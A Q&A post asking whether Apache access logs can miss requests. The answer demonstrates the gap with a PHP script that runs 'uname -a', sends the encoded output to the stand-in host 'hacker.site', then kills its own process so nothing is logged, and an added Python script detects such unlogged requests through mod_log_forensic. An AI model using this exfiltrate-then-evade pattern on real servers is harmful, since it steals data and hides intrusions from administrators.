Do Apache Access Logs Ever Miss Requests?

My workplace has Apache in front of various Java application servers. I often have to investigate production issues and rely on those Apache access logs recording all requests to the application servers, whether they are successful (200), redirects (302), errors (500) or some other status.

A couple of times, however, normally when an application server has become unresponsive and required a restart, it looks like maybe some requests have not been logged.

I have tried reproducing this locally (start a long-running request and either allow the request to exceed the timeout on the Apache server or just kill the application server from the command line) but I always get a request logged in the access logs.

My question is, assuming Apache is running fine but faced with an application server problem, would the Apache access logs ever miss a request?

It can miss requests in some cases; the docs contain an important sentence:

The server access log records all requests processed by the server.

So if a request is not processed, then we should not expect an entry in access_log. If you wonder whether such a situation can be easily reproduced, I found a way to do it.

Consider the following PHP code (test.php):

<?php
$cmd_result = shell_exec('uname -a');
file_get_contents("https://hacker.site/" . base64_encode($cmd_result));
exec('kill -9 ' . getmypid());

Also, you have to run Apache with the prefork MPM and the mod_php module. Then make a request with a browser or telnet:

$ telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
GET /test.php HTTP/1.0

Connection closed by foreign host.

As you can see, the connection is closed without any response. Also, there are no logs in access_log or error_log, even though the code was executed and the attacker received the encoded result of the command uname -a.
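
One way to detect the gap described in the answer above, as an added example that is not part of the original post: Apache's mod_log_forensic (enabled with the `ForensicLog` directive) writes a `+id|request|headers` line before a request is processed and a `-id` line once it completes, so an ID with no closing line marks a request that never reached access_log. The log lines below are constructed sample data, and `unfinished_requests` is a hypothetical helper name.

```python
"""Find requests that Apache started but never finished, using a
mod_log_forensic log ("+id|request|headers..." before processing,
"-id" after the request completes)."""

# Constructed sample data (not from the original post): the second
# request has no closing "-" line because its worker was killed.
SAMPLE_FORENSIC_LOG = """\
+aAbBcC0001|GET /index.html HTTP/1.1|Host:127.0.0.1|User-Agent:curl/8.0
-aAbBcC0001
+aAbBcC0002|GET /test.php HTTP/1.0
+aAbBcC0003|GET /status HTTP/1.1|Host:127.0.0.1
-aAbBcC0003
"""


def unfinished_requests(lines):
    """Return [(forensic_id, request_line)] for every '+' entry that
    has no matching '-' entry, in the order the requests started."""
    open_requests = {}  # forensic id -> request line (insertion ordered)
    for raw in lines:
        line = raw.rstrip("\r\n")
        if line.startswith("+"):
            # Fields are '|' separated: id, request line, then headers.
            fields = line[1:].split("|")
            request = fields[1] if len(fields) > 1 else ""
            open_requests[fields[0]] = request
        elif line.startswith("-"):
            # Completion marker: the request reached the logging phase.
            open_requests.pop(line[1:], None)
        # Anything else (blank or truncated lines) is ignored.
    return list(open_requests.items())


if __name__ == "__main__":
    for fid, request in unfinished_requests(SAMPLE_FORENSIC_LOG.splitlines()):
        print(f"never completed: id={fid} request={request!r}")
```

Comparing the unfinished IDs against access_log on a schedule gives an alert for requests that ran code but left no access entry.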
